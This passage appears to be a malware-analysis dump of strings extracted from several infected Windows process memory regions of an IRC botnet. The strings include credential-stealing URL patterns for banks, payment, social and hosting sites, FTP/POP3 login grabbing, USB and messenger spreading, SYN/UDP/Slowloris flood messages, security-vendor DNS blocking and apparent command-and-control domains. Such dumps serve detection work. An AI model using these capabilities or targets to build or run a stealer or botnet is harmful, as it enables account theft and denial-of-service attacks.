[e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Upwiwc.exe</pre><pre>7 767<7><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><b>svchost.exe_340_rwx_00C80000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked 
"%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL 
'%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.mon
eybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s 
hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread 
interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%System%\svchost.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Upwiwc.exe</pre><pre>7 
767<7><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe</pre><b>mscorsvw.exe_424_rwx_008D0000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" 
from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploa
ding.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d 
logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK 
%s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. 
[e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%WinDir%\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Upwiwc.exe</pre><pre>7 767<7><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" 
%S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe</pre><b>jqs.exe_480_rwx_010C0000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s 
(p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre